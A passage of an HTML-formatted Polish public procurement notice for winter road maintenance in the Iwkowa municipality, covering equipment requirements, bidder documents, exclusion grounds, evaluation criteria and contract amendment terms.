Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie formułuje szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie formułuje szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">•	dla Części 1 – REJON NR I w miejscowości Iwkowa, Połom Mały;Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:- dwoma ciągnikami: moc min. 50 kM, napęd min. 2 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jeden pług wirnikowy doczepiany lub samobieżnyDodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki.Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych. •	dla Części 2 – REJON NR II w miejscowościach: Kąty, Dobrociesz, Drużków Pusty, Prąbka Iwkowska; Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej: - dwoma ciągnikami: moc min. 80 kM, napęd min. 4 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jednym pługiem wirnikowym doczepianym lub samobieżnym.Dodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki.Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych.Uwaga: Wykonawca musi dysponować wyżej wymienioną ilością i rodzajem pojazdów/sprzętu oddzielnie dla każdej części zamówienia (tj.: pojazdy/sprzęt dla poszczególnych części zamówienia nie mogą się powtarzać).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia przez Wykonawcę, którego oferta została najwyżej oceniona braku podstaw wykluczenia, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia:- Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia przez Wykonawcę, którego oferta została najwyżej oceniona, spełnienia warunków udziału w postępowaniu, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia: - wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - wg wzoru stanowiącego zał. nr. 6 do SIWZ. Z wykazu w sposób jednoznaczny ma wynikać, iż wykonawca spełnia warunek opisany w rozdziale V, pkt. 2 niniejszej siwz – UWAGA: ODDZIELNIE DLA KAŻDEJ CZĘŚCI – REJONU.Uwaga: W przypadku składania ofert na więcej niż jedną część zamówienia Wykonawca musi złożyć oddzielne wykazy sprzętu dla każdej z takich części. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1). Wypełniony formularz oferty – wg wzoru stanowiącego załącznik nr 1 do SIWZ, wraz ze wszystkimi wymaganymi załącznikami i dokumentami.2). Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika podmiotów występujących wspólnie (konsorcja, spółki cywilne) zgodnie z obowiązkiem wynikającym z art.23 ust. 1 i 2 ustawy Pzp lub w imieniu wykonawcy (jeżeli ofertę i załączone do niej dokumenty podpisują osoby nieujawnione w rejestrze lub ewidencji, do oferty należy dołączyć stosowne pełnomocnictwa udzielone przez osobę/osoby ujawnioną w rejestrze lub ewidencji), pełnomocnictwo musi zawierać stwierdzenie, że upełnomocnieni są uprawnieni do zaciągania zobowiązań w imieniu wykonawcy lub podmiotów występujących wspólnie.Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa musi być ona potwierdzona za zgodność z oryginałem notarialnie.3). Wykaz dokumentów, które wykonawca zastrzega, jako niejawne dla innych uczestników postępowania i osób trzecich (poza członkami komisji przetargowej), stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą być one udostępniane oraz wykazał, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.4). Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w ppkt. „a” powyżej (załącznik nr 2 i 3).5). Zobowiązanie podmiotów trzecich do oddania do dyspozycji wykonawcy zasobów niezbędnych do wykazania spełnienia warunków udziału - wg wzoru stanowiącego załącznik nr 5.(tylko w przypadku, gdy wykonawca w celu wykazania spełnienia warunków udziału korzysta z zasobów podmiotów trzecich)6). Wykonawca, który ma zamiar powierzyć część zamówienia podwykonawcy- uzupełnia oświadczenie, o którym mowa w ppkt. ”a” powyżej we wskazanym miejscu (załącznik nr 3).7). Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust 5 ustawy Pzp,(informacji zamawiającego z sesji otwarcia ofert) przekazuje Zamawiającemu (bez wezwania) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp - według wzoru stanowiącego załącznik nr 4 do SIWZ. W przypadku przynależności do tej samej grupy kapitałowej, wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w niniejszym postępowaniu o udzielenie zamówienia.8).	Dokumenty podmiotów zagranicznych: a)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa pkt. 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:- nie otwarto jego likwidacji ani nie ogłoszono upadłości – wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o którym mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby – wystawione zgodnie z terminami określonymi ” powyżej.c)	W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczące tego dokumentu.9).	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy. a)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (wspólnicy spółki cywilnej lub członkowie konsorcjum) mają obowiązek ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy. b)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego muszą dołączyć do oferty stosowne pełnomocnictwo. c)	Pełnomocnictwo musi zawierać stwierdzenie, że pełnomocnicy są uprawnieni do reprezentowania w postępowaniu i zaciągania zobowiązań w imieniu podmiotów występujących wspólnie. d)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w rozdziale VII w pkt. 1 lit.”a” niniejszego rozdziału SIWZ składa oddzielnie każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.e)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którym mowa w rozdziale VII w pkt. 1 lit.”e” niniejszego rozdziału SIWZ składa oddzielnie każdy z Wykonawców.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena (brutto)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Czas reakcji w celu podjęcia interwencji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zamawiający informuje, że przewiduje możliwość zmiany umowy na podstawie art. 144 ust. 1 pkt. 1 ustawy Pzp, która może nastąpić w formie aneksu pod rygorem nieważności, w następujących przypadkach:1)	Zmiana terminu wykonania zamówienia:- zmian okresu trwania prac przy zimowym utrzymaniu dróg (rozpoczęcie i zakończenie sezonów zimowych), ze względu na występujące warunki atmosferyczne (np. opady śniegu, gołoledź itp.)- wydłużenie terminu wykonania zamówienia z uwagi na wystąpienie nadzwyczajnych warunków pogodowych niepozwalających na wykonanie zamówienia zgodnie z warunkami wykonania określonymi w SIWZ, wystąpienia innych okoliczności niezależnych od wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego. - konieczność zlecenia zamówień dodatkowych.2)	wysokości wynagrodzenia w przypadku: a) zmiany obowiązującej stawki podatku VAT, b) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; d) sposobu wykonania przedmiotu umowy w przypadku: zasadności zmiany ustalonych standardów i innych warunków wykonania przedmiotu umowy w przypadku wystąpienia okoliczności uzasadniających taką zmianę, których nie można było przewidzieć.3) Pozostałe zmiany:a) zmiany lub rezygnacji z podwykonawcy, w tym zwłaszcza, jeżeli dotyczy ona podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 22a ust. 1 Pzp w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp, przy wykazaniu przez Wykonawcę, że proponowany inny podwykonawca lub wykonawca samodzielnie spełniają je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca się powoływał w trakcie postępowania o udzielenie zamówienia publicznego. b) zmiany (w uzasadnionych okolicznościach) ilości i zakresu utrzymania powierzonych Wykonawcy dróg,c) zmiana osób wyznaczonych do nadzorowania,d) zmiana osób realizujących zamówienie pod warunkiem że osoby te będą spełniały wymagania określone w SIWZ, e) rozszerzenia przez Zamawiającego zakresu robót o 